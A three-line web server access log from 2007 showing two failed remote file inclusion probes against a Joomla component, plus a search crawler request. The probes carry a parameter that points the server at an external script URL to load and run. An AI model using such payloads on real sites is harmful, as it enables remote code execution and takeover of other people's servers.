193.189.139.34 - - [18/Aug/2007:06:29:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.25.226 - - [18/Aug/2007:06:29:26 -0700] "GET /logs/access.log HTTP/1.0" 200 448078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
193.189.139.34 - - [18/Aug/2007:06:29:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
